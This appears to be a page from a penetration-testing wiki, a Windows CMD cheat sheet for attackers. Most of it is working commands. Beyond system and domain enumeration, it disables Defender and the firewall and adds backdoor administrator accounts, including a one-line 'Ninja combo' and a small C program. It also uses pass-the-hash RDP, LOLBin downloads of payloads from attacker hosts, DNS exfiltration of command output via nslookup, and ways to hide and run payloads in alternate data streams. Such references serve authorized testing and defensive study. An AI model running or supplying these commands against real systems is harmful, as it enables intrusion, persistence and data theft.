Basic CMD for Pentesters

System info
Version and Patches info
1
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
2
systeminfo
3
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
4
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
5
hostname
6
DRIVERQUERY #3rd party driver vulnerable?
Copied!
Environment
1
set #List all environment variables
Copied!
Some env variables to highlight:
COMPUTERNAME: Name of the computer
TEMP/TMP: Temp folder
USERNAME: Your username
HOMEPATH/USERPROFILE: Home directory
windir: C:\Windows
OS:Windos OS
LOGONSERVER: Name of domain controller
USERDNSDOMAIN: Domain name to use with DNS
USERDOMAIN: Name of the domain
1
nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
Copied!
Mounted disks
1
(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
2
wmic logicaldisk get caption,description,providername
Copied!
AV
1
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
2
sc query windefend
3
#Delete all rules of Defender (useful for machines without internet access)
4
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Copied!
Recycle Bin
1
dir C:\$Recycle.Bin /s /b
Copied!
Processes, Services & Software
1
schtasks /query /fo LIST /v #Verbose out of scheduled tasks
2
schtasks /query /fo LIST 2>nul | findstr TaskName
3
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
4
tasklist /V #List processes
5
tasklist /SVC #links processes to started services
6
net start #Windows Services started
7
wmic service list brief #List services
8
sc query #List of services
9
dir /a "C:\Program Files" #Installed software
10
dir /a "C:\Program Files (x86)" #Installed software
11
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
Copied!
Domain info
1
echo %USERDOMAIN% #Get domain name
2
echo %USERDNSDOMAIN% #Get domain name
3
echo %logonserver% #Get name of the domain controller
4
set logonserver #Get name of the domain controller
5
set log #Get name of the domain controller
6
net groups /domain #List of domain groups
7
net group "domain computers" /domain #List of PCs connected to the domain
8
net view /domain #Lis of PCs of the domain
9
nltest /dclist:<DOMAIN> #List domain controllers
10
net group "Domain Controllers" /domain #List PC accounts of domains controllers
11
net group "Domain Admins" /domain #List users with domain admin privileges
12
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the grup "Domain Admins" is included here)
13
net user /domain #List all users of the domain
14
net user <ACCOUNT_NAME> /domain #Get information about that user
15
net accounts /domain #Password and lockout policy
16
nltest /domain_trust #Mapping of the trust relationships.
Copied!
Logs & Events
1
#Make a security query using another credentials
2
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
Copied!
Users & Groups
Users
1
whoami /all #All info about me, take a look at the enabled tokens
2
whoami /priv #Show only privileges
3
net users #All users
4
dir /b /ad "C:\Users"
5
net user %username% #Info about a user (me)
6
net accounts #Information about password requirements
7
qwinsta #Anyone else logged in?
8
cmdkey /list #List credential
9
net user /add [username] [password] #Create user
10
​
11
#Lauch new cmd.exe with new creds (to impersonate in network)
12
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
13
​
14
#Check current logon session as administrator using logonsessions from sysinternals
15
logonsessions.exe
16
logonsessions64.exe
Copied!
Groups
1
#Local
2
net localgroup #All available groups
3
net localgroup Administrators #Info about a group (admins)
4
net localgroup administrators [username] /add #Add user to administrators
5
​
6
#Domain
7
net group /domain #Info about domain groups
8
net group /domain <domain_group_name> #Users that belongs to the group
Copied!
List sessions
1
qwinsta
2
klist sessions
Copied!
Password Policy
1
net accounts
Copied!
Persistence with users
1
# Add domain user and put them in Domain Admins group
2
net user username password /ADD /DOMAIN
3
net group "Domain Admins" username /ADD /DOMAIN
4
​
5
# Add local user and put them local Administrators group
6
net user username password /ADD
7
net localgroup Administrators username /ADD
8
​
9
# Add user to insteresting groups:
10
net localgroup "Remote Desktop Users" UserLoginName  /add
11
net localgroup "Debugger users" UserLoginName /add
12
net localgroup "Power users" UserLoginName /add
Copied!
Network
Interfaces, Routes, Ports, Hosts and DNSCache
1
ipconfig /all #Info about interfaces
2
route print #Print available routes
3
arp -a #Know hosts
4
netstat -ano #Opened ports?
5
type C:\WINDOWS\System32\drivers\etc\hosts
6
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
Copied!
Firewall
1
netsh firewall show state # FW info, open ports
2
netsh advfirewall firewall show rule name=all
3
netsh firewall show config # FW info
4
Netsh Advfirewall show allprofiles
5
​
6
NetSh Advfirewall set allprofiles state off  #Turn Off
7
NetSh Advfirewall set allprofiles state on  #Trun On
8
netsh firewall set opmode disable #Turn Off
9
​
10
::How to open ports
11
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
12
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
13
netsh firewall add portopening TCP 3389 "Remote Desktop" 
14
​
15
::Enable Remote Desktop
16
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
17
netsh firewall add portopening TCP 3389 "Remote Desktop"
18
::netsh firewall set service remotedesktop enable #I found that this line is not needed
19
::sc config TermService start= auto #I found that this line is not needed
20
::net start Termservice #I found that this line is not needed
21
​
22
::Enable Remote assistance:
23
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
24
netsh firewall set service remoteadmin enable
25
​
26
::Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
27
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
28
​
29
::Connect to RDP (using hash or password)
30
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
31
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
Copied!
Shares
1
net view #Get a list of computers
2
net view /all /domain [domainname] #Shares on the domains
3
net view \\computer /ALL #List shares of a computer
4
net use x: \\computer\share #Mount the share locally
5
net share #Check current shares
Copied!
Wifi
1
netsh wlan show profile #AP SSID
2
netsh wlan show profile <SSID> key=clear #Get Cleartext Pass
Copied!
SNMP
1
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Copied!
Network Interfaces
1
ipconfig /all
Copied!
ARP table
1
arp -A
Copied!
Download
Bitsadmin.exe
1
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
Copied!
CertReq.exe
1
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Copied!
Certutil.exe
1
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
Copied!
Desktopimgdownldr.exe
1
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Copied!
Diantz.exe
1
diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
Copied!
Esentutl.exe
1
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Copied!
Expand.exe
1
expand \\webdav\folder\file.bat c:\ADS\file.bat
Copied!
Extrac32.exe
1
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Copied!
Findstr.exe
1
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
Copied!
Ftp.exe
1
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Copied!
GfxDownloadWrapper.exe
1
C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
Copied!
Hh.exe
1
HH.exe http://some.url/script.ps1
Copied!
Ieexec.exe
1
ieexec.exe http://x.x.x.x:8080/bypass.exe
Copied!
Makecab.exe
1
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
Copied!
MpCmdRun.exe
1
MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable
Copied!
Replace.exe
1
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Copied!
Excel.exe
1
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Copied!
Powerpnt.exe
1
Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Copied!
Squirrel.exe
1
squirrel.exe --download [url to package]
Copied!
Update.exe
1
Update.exe --download [url to package]
Copied!
Winword.exe
1
winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Copied!
Wsl.exe
1
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Copied!
Misc
1
cd #Get current dir
2
cd C:\path\to\dir #Change dir
3
dir #List current dir
4
dir /a:h C:\path\to\dir #List hidden files
5
dir /s /b #Recursive list without shit
6
time #Get current time
7
date #Get current date
8
shutdown /r /t 0 #Shutdown now
9
type <file> #Cat file
10
​
11
#Runas
12
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
13
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
14
​
15
#Hide
16
attrib +h file #Set Hidden
17
attrib -h file #Quit Hidden
18
​
19
#Give full control over a file that you owns
20
icacls <FILE_PATH> /t /e /p <USERNAME>:F
21
icacls <FILE_PATH> /e /r <USERNAME> #Remove the permision
22
​
23
#Recursive copy to smb
24
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
25
​
26
#exe2bat to transform exe file in bat file
27
​
28
#ADS
29
dir /r #Detect ADS
30
more file.txt:ads.txt #read ADS
31
powershell (Get-Content file.txt -Stream ads.txt)
Copied!
Listen address ACLs
You can listen on http://+:80/Temporary_Listen_Addresses/ without being administrator.
1
netsh http show urlacl
Copied!
Manual DNS shell
Attacker (Kali) must use one of these 2 options:
1
sudo responder -I <iface> #Active
2
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive
Copied!
Victim
for /f tokens _**_technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server
1
for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
2
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
3
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
4
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
5
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
6
#More complex commands
7
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one
Copied!
You can also redirect the output, and then read it.
1
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
2
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
Copied!
Calling CMD from C code
1
#include <stdlib.h>     /* system, NULL, EXIT_FAILURE */
2
​
3
// When executed by Administrator this program will create a user and then add him to the administrators group
4
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
5
// upx -9 addmin.exe
6
​
7
int main (){
8
    int i;
9
    i=system("net users otherAcc 0TherAcc! /add");
10
    i=system("net localgroup administrators otherAcc /add");
11
    return 0;
12
}
Copied!
Alternate Data Streams CheatSheet (ADS/Alternate Data Stream)
Taken from https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f​
1
###Add content to ADS###
2
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
3
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
4
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
5
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
6
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
7
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
8
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
9
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
10
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
11
esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
12
powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
13
curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
14
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat
15
set-content - path {path to the file} - stream {name of the stream}
16
​
17
### Discover ADS contecnt
18
dir /R 
19
streams.exe <c:\path\to\file> #Binary from sysinternals#
20
Get-Item -Path .\fie.txt -Stream *
21
gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'
22
​
23
###Extract content from ADS###
24
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
25
esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o
26
more < c:\ads\file.txt:test.exe
27
​
28
###Executing the ADS content###
29
​
30
* WMIC
31
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
32
​
33
* Rundll32
34
rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
35
rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll
36
rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll
37
​
38
* Cscript
39
cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"
40
​
41
* Wscript
42
wscript c:\ads\file.txt:script.vbs
43
echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
44
​
45
* Forfiles
46
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"
47
​
48
* Mavinject.exe
49
c:\windows\SysWOW64\notepad.exe
50
tasklist | findstr notepad
51
notepad.exe                   4172 31C5CE94259D4006           2     18,476 K
52
type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
53
c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
54
​
55
* MSHTA
56
mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
57
(Does not work on Windows 10 1903 and newer)
58
​
59
* Control.exe
60
control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
61
https://twitter.com/bohops/status/954466315913310209
62
​
63
* Create service and run
64
sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
65
sc start evilservice
66
https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
67
​
68
* Powershell.exe
69
powershell -ep bypass - < c:\temp:ttt
70
​
71
* Powershell.exe
72
powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"
73
​
74
* Powershell.exe
75
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe}
76
​
77
* Regedit.exe
78
regedit c:\ads\file.txt:regfile.reg
79
​
80
* Bitsadmin.exe
81
bitsadmin /create myfile
82
bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
83
bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
84
bitsadmin /RESUME myfile
85
​
86
* AppVLP.exe
87
AppVLP.exe c:\windows\tracing\test.txt:ha.exe
88
​
89
* Cmd.exe
90
cmd.exe - < fakefile.doc:reg32.bat
91
https://twitter.com/yeyint_mth/status/1143824979139579904
92
​
93
* Ftp.exe
94
ftp -s:fakefile.txt:aaaa.txt
95
https://github.com/sailay1996/misc-bin/blob/master/ads.md
96
​
97
* ieframe.dll , shdocvw.dll (ads)
98
echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt
99
rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt
100
https://github.com/sailay1996/misc-bin/blob/master/ads.md
101
​
102
* bash.exe
103
echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh
104
bash.exe -c $(fakefile.txt:payload.sh)
105
https://github.com/sailay1996/misc-bin/blob/master/ads.md
106
​
107
* Regsvr32
108
type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS
109
regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS
Copied!

Windows - Previous

Authentication, Credentials, UAC and EFS

Next - Windows

Basic PowerShell for Pentesters

Last modified 1mo ago